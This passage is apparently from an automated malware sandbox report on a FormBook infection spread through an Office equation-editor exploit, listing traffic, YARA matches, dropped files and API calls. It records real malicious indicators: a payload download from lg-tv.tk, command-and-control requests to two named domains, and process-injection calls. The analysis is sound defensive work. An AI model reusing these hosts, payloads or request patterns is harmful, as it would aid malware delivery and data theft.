      Source: explorer.exe, 00000006.00000000.524604112.0000000004513000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
      Source: explorer.exe, 00000006.00000000.465258321.00000000045D4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
      Source: explorer.exe, 00000006.00000000.468389644.000000000840D000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1enu
      Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
      Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78388EE1-378B-4475-870B-E925774DE169}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: lg-tv.tk
      Source: global trafficHTTP traffic detected: GET /harshmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS HTTP/1.1Host: www.ceasa.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hht8/?3f_l=kMYE47A9Ipt2JQtPCSStI6O3jSMpHsULQE7+uza83sv6yxZmMge2O0x1IBVpwyYq5aFQXg==&e6-0=cZQH7dS HTTP/1.1Host: www.alzayantourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hasmenhtk721.exeJump to dropped file
      .NET source code contains very large stringsShow sources
      Source: harshmanzx[1].exe.2.dr, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: hasmenhtk721.exe.2.dr, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 4.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 4.2.hasmenhtk721.exe.bb0000.2.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 5.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 5.2.hasmenhtk721.exe.bb0000.3.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4_2_003969C9
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4_2_00396D30
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4_2_003990B0
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4_2_0039B381
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4_2_020B5B90
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4_2_020B0048
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 4_2_003900F0
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0040102E
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00401030
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041DAD8
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041ED7F
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00402D87
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00402D90
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00409E50
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041D630
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00402FB0
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CBE0C6
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CC3040
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CD905A
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CED005
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CBE2E9
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D61238
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CBF3CF
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CE63DB
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CC7353
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D0A37B
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CC2305
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CD1489
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CF5485
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CDC5F0
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CC351F
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CCE6C1
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CC4680
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D62622
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CF57C3
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D4579A
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CCC7BC
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D5F8EE
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CCC85C
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CE286D
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CD69FE
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D6098E
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CC29B2
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D45955
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D73A83
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D4DBDA
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CBFBD7
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D6CBA4
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CE7B00
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00D5FDDD
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CCCD5B
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CF0D3B
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CDEE4C
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CF2E2F
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CEDF7C
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CD0F3F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024A1238
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023FE2E9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02407353
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0244A37B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02402305
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024263DB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023FF3CF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02403040
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0241905A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0242D005
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023FE0C6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024A2622
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0240E6C1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02404680
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024357C3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0248579A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0240C7BC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02435485
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02411489
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0240351F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0241C5F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024B3A83
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02427B00
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0248DBDA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023FFBD7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024ACBA4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0240C85C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0242286D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0249F8EE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02485955
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024169FE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024A098E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024029B2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0241EE4C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02432E2F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0242DF7C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02410F3F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0240CD5B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02430D3B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0249FDDD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BD630
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BED7F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000A2D87
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000A2D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000A9E50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000A2FB0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 023FDF5C appears 107 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02443F92 appears 108 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0244373B appears 238 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0246F970 appears 81 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 023FE2A8 appears 38 times
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: String function: 00D03F92 appears 108 times
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: String function: 00D0373B appears 238 times
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: String function: 00CBE2A8 appears 38 times
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: String function: 00D2F970 appears 81 times
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: String function: 00CBDF5C appears 105 times
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041A350 NtCreateFile,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041A400 NtReadFile,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041A480 NtClose,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041A530 NtAllocateVirtualMemory,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041A30A NtCreateFile,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041A3FD NtReadFile,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041A47A NtClose,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041A52B NtAllocateVirtualMemory,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB00C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB0048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB0078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAF9F0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAF900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB10D0 NtOpenProcessToken,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB0060 NtQuerySection,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB01D4 NtSetValueKey,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB1148 NtOpenThread,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB010C NtOpenDirectoryObject,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB07AC NtCreateMutant,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAF8CC NtWaitForSingleObject,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAF938 NtWriteFile,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB1930 NtSetContextThread,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFAB8 NtQueryValueKey,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFA50 NtEnumerateValueKey,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFA20 NtQueryInformationFile,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFBE8 NtQueryVirtualMemory,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFB50 NtCreateKey,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFC48 NtSetInformationFile,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB0C40 NtGetContextThread,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFC30 NtOpenProcess,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CB1D80 NtSuspendThread,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFD5C NtEnumerateKey,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFE24 NtWriteVirtualMemory,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFFFC NtCreateProcessEx,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CAFF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F00C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F07AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFAB8 NtQueryValueKey,LdrInitializeThunk,
